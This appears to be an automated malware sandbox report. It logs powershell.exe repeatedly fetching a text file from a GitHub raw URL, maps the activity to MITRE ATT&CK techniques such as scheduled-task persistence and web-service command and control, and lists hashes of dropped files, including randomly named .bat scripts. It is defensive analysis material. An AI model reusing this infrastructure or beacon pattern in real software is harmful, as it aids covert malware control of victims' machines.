X-Cache-Hits: 1
X-Timer: S1734841494.148112,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: a174ce75420160518f07110b9a897091310d5814
Expires: Sun, 22 Dec 2024 04:29:54 GMT
Source-Age: 217
DNS

133.111.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.111.199.185.in-addr.arpa

IN PTR

Response

133.111.199.185.in-addr.arpa

IN PTR

cdn-185-199-111-133githubcom
DNS

196.249.167.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.249.167.52.in-addr.arpa

IN PTR

Response
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

powershell.exe

Remote address:

185.199.111.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:25:05 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600047-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734841505.347266,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 21f3ebd4c4320b8577a9c47eef347d19222571ee
Expires: Sun, 22 Dec 2024 04:30:05 GMT
Source-Age: 299
DNS

200.163.202.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.163.202.172.in-addr.arpa

IN PTR

Response
DNS

15.164.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

15.164.165.52.in-addr.arpa

IN PTR

Response
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

powershell.exe

Remote address:

185.199.111.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:25:13 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600033-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734841514.582436,VS0,VE118
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 8fdbb818a475cb943f8de10547cfc936e58446cd
Expires: Sun, 22 Dec 2024 04:30:13 GMT
Source-Age: 0
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

powershell.exe

Remote address:

185.199.111.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:25:24 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600058-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734841525.998556,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 5b2831c3091651c05a87d787eb52fbb3d4c64cc1
Expires: Sun, 22 Dec 2024 04:30:24 GMT
Source-Age: 11
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

powershell.exe

Remote address:

185.199.111.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:25:40 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600062-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734841540.351220,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 66a72b34706f50148219453be556b3efae93603d
Expires: Sun, 22 Dec 2024 04:30:40 GMT
Source-Age: 27
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

powershell.exe

Remote address:

185.199.111.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:25:49 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600028-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734841549.286148,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: ff796b9082cc36cfc6a83153bc985ea4fa6a06e2
Expires: Sun, 22 Dec 2024 04:30:49 GMT
Source-Age: 36
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

powershell.exe

Remote address:

185.199.111.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:26:03 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600071-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734841563.100142,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 0c22786e967da248d0d3c4ef288ad0c0666b8bd1
Expires: Sun, 22 Dec 2024 04:31:03 GMT
Source-Age: 49
DNS

11.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

11.227.111.52.in-addr.arpa

IN PTR

Response
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

powershell.exe

Remote address:

185.199.111.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:26:09 GMT
Via: 1.1 varnish
X-Served-By: cache-lon420124-LON
X-Cache: HIT
X-Cache-Hits: 2
X-Timer: S1734841570.625264,VS0,VE0
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: d5dc25f10ed80c67faf24f34c4dccf83f9b5fd70
Expires: Sun, 22 Dec 2024 04:31:09 GMT
Source-Age: 292
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

powershell.exe

Remote address:

185.199.111.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:26:17 GMT
Via: 1.1 varnish
X-Served-By: cache-lon4255-LON
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734841577.065606,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 7a96fc1476f00a0ade37aa43a159ac0acfd8cfc1
Expires: Sun, 22 Dec 2024 04:31:17 GMT
Source-Age: 300
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

powershell.exe

Remote address:

185.199.111.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:26:29 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600046-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734841590.970856,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: e8b00e660427286e607ee296dfca0f4465391387
Expires: Sun, 22 Dec 2024 04:31:29 GMT
Source-Age: 76
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

powershell.exe

Remote address:

185.199.111.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:26:40 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600051-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734841601.597910,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: df0c320cb2d0f42c914f05a4408d2883e9165eaa
Expires: Sun, 22 Dec 2024 04:31:40 GMT
Source-Age: 87
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

powershell.exe

Remote address:

185.199.111.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:26:52 GMT
Via: 1.1 varnish
X-Served-By: cache-lon420101-LON
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734841612.000840,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: faa5831823d59ed7e10a836175f90f1cb54b92a8
Expires: Sun, 22 Dec 2024 04:31:52 GMT
Source-Age: 19

185.199.111.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

powershell.exe

861 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.111.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

powershell.exe

897 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.111.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

powershell.exe

861 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.111.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

powershell.exe

897 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.111.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

powershell.exe

861 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.111.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

powershell.exe

897 B
5.1kB
8
10

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.111.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

powershell.exe

914 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.111.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

powershell.exe

861 B
5.1kB
8
10

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.111.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

powershell.exe

914 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.111.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

powershell.exe

897 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.111.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

powershell.exe

914 B
5.1kB
8
10

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.111.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

powershell.exe

897 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.111.133:443

powershell.exe

8.8.8.8:53

232.168.11.51.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

232.168.11.51.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

raw.githubusercontent.com

dns

powershell.exe

71 B
135 B
1
1

DNS Request

raw.githubusercontent.com

DNS Response

185.199.111.133

185.199.109.133

185.199.110.133

185.199.108.133
8.8.8.8:53

133.111.199.185.in-addr.arpa

dns

74 B
118 B
1
1

DNS Request

133.111.199.185.in-addr.arpa
8.8.8.8:53

196.249.167.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

196.249.167.52.in-addr.arpa
8.8.8.8:53

200.163.202.172.in-addr.arpa

dns

74 B
160 B
1
1

DNS Request

200.163.202.172.in-addr.arpa
8.8.8.8:53

15.164.165.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

15.164.165.52.in-addr.arpa
8.8.8.8:53

11.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

11.227.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\DllCommonsvc.exe.log

Filesize
1KB

MD5
7f3c0ae41f0d9ae10a8985a2c327b8fb

SHA1
d58622bf6b5071beacf3b35bb505bde2000983e3

SHA256
519fceae4d0dd4d09edd1b81bcdfa8aeab4b59eee77a4cd4b6295ce8e591a900

SHA512
8a8fd17eef071f86e672cba0d8fc2cfed6118aff816100b9d7c06eb96443c04c04bc5692259c8d7ecb1563e877921939c61726605af4f969e3f586f0913ed125

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
59d97011e091004eaffb9816aa0b9abd

SHA1
1602a56b01dd4b7c577ca27d3117e4bcc1aa657b

SHA256
18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d

SHA512
d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
62623d22bd9e037191765d5083ce16a3

SHA1
4a07da6872672f715a4780513d95ed8ddeefd259

SHA256
95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

SHA512
9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
3a6bad9528f8e23fb5c77fbd81fa28e8

SHA1
f127317c3bc6407f536c0f0600dcbcf1aabfba36

SHA256
986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05

SHA512
846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
3db1c0d23daacf01eb99125ccc2787d3

SHA1
0849528de1ba411279231d635d8f39d54cc829d2

SHA256
bceb96f5c3d31447980eb8cd891bba75b3e5b6eb60abf4d829fc13cd8faf2582

SHA512
3d84635a3395bca1d91ce182ccfb9e38c8da87ad678704673a72d580e4251cedc5a6b2a89040a172a5687b67952e74a13673bd115bce7bdabaed06f89323de5b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e59140d6693b6a0f6a8617b45bdef9fe

SHA1
7157a22b2533d10fe8ed91d2c5782b44c79bbcde

SHA256
baeb07292d7c8d7ba665a29178999ea08d4b26e8d05bb29c6dee8b8dad8de27e

SHA512
117494cb9415e968827ec38ff11fe6eb4781a76476a2a580f08c5f2d5d4f7ccac425dfd81c16536342a32b42a7b3dffdf471dd2666b1a11ded9f57108c6df7b7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
32b16440fab3a1055d9c22b90935bdfb

SHA1
ee350c4a65b81468487a3660dfe4f373660b9070

SHA256
ee68b728a82fefc941eba10390d9d70f5aeb442039c901eaf9a18477761cfd35

SHA512
5a1f36ab56e25548fd2875d364cfec39830e855b89628718f786bb8158147ee6fd66f2b7477d1b57b0d8cec5b8f10d173face18f4131ecec0dc67ca9ae56216c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
5c6a4837827aa7bf21a6269840c3a32a

SHA1
a33e326523078909f4c69f405c97fa32de83b413

SHA256
a40dfcb752571b296818265d6d1a531493e0652cc125b675c327ab4dbf2b8d28

SHA512
767d703dd1e46bff0c74ef4afacce42241b423dd4a1fda6e43426d9f4a6fc3d720e5816e916febc35cdd3667bdc7465bce371bca50b5612752f05d57f83b90c0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
fe9b96bc4e29457b2d225a5412322a52

SHA1
551e29903e926b5d6c52a8f57cf10475ba790bd0

SHA256
e81b9bfd38a5199813d703d5caf75baa6f62847b2b9632302b5d6f10dd6cf997

SHA512
ff912526647f6266f37749dfdc3ed5fd37c35042ba481331434168704c827d128c22093ba73d7ad0cecde10365f0978fcd3f3e2af1a1c280cd2e592a62d5fa80

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
08526e4d8fed0a382c243c9aa8b1fe45

SHA1
f3da4b97529aaa38230db8bfa34a345bbc211622

SHA256
b5044625d66b7835745c7c4efa14d21aaf4ee42bf971f8bbc44f04416b91441f

SHA512
cbeb569db60eabd89c13b073f1bdf7ba991b6206e75f548396a150b08a0ffed1962d88d664e069c64ac740afbb69941df2f43e81a3f138e2185934967898941d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
fb0d50e170c2fd9a4eaa64ab30f3823d

SHA1
d71c9bf750b9e4aa1f635fb791b69453028ce1ad

SHA256
eb241fbb0c3f54ae1e9f9a7a1fd9a2ac3599eabf7bdab47836652efcaf7c9247

SHA512
2f64b4405355c89c3f19818d03f4c65e12e18651c3b0729ff032622ecdb8fd4de57f16851e2e59abb06d48ebeeb3c190d712396ea514da5c75ae6d0d0d568c6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\3j9hYFnRH7.bat

Filesize
230B

MD5
2ff93fa65394fb9b30ba527f6108895a

SHA1
49adabbd776b3c642fb7567b370e51d820145a42

SHA256
a808ee6df66b81e716f4e54dc0acd6557ddacd546f7eda8343ab85469665579f

SHA512
ce0099559e7bb2a9007a38e0565e35131d32046cc4e666927dca5076c7374b4cde5f53be40a5fb8e4e1073a78ebc52edf2380c9d4337ffdfd193b60043bc050c

Download Submit
C:\Users\Admin\AppData\Local\Temp\5mXdMdden9.bat

Filesize
230B

MD5
0d48796228b23313fd82ad63366e2bff

SHA1
746938f34ad9b8098fc0077db817e0840ad7c05e

SHA256
e53c1ca03d761adc1c47009b71246c3110779846fd09f814a4b7e96ef14ec672

SHA512
1966ff7a73bbec5ad029ba1d27b1ec59d987397634a0637bd14f5cdea6a6ebf73d64d5a2975ad7b469ce278eb606b1af6081cc3ad38bb62dfd4028b827ef71ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\EVfp7xrD4G.bat

Filesize
230B

MD5
d57488c6ae33a58167e40f77ca7c3888

SHA1
46ccd9c9d1ccbac007e5b9c3b610aa93f822e396

SHA256
d1c35c31b0c55deb5207288dec951e12c84d80f95b61859b8e19a1ebf65d8fd7

SHA512
